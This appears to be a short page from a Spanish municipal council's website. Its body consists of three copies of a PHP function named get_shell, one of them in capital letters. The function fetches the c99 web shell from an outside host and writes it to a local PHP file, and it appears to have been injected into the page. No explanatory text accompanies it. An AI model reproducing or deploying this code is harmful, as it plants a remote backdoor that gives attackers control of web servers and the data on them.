01 de Enero de 2000

FUNCTION GET_SHELL($STRING) { $FILE = FILE_GET_CONTENTS('HTTP://WWW.SALDIRI.ORG/C99.TXT'); $FP = FOPEN('MANHLUAT93.PHP','W+'); $FW = FWRITE($FP,$FILE); FCLOSE($FP); }

function get_shell($string) { $file = file_get_contents('http://www.saldiri.org/c99.txt'); $fp = fopen('manhluat93.php','w+'); $fw = fwrite($fp,$file); fclose($fp); }

function get_shell($string) {
$file = file_get_contents('http://www.saldiri.org/c99.txt');
$fp = fopen('manhluat93.php','w+');
$fw = fwrite($fp,$file);
fclose($fp);
}

 

Excmo. Ayuntamiento de Fuente del Maestre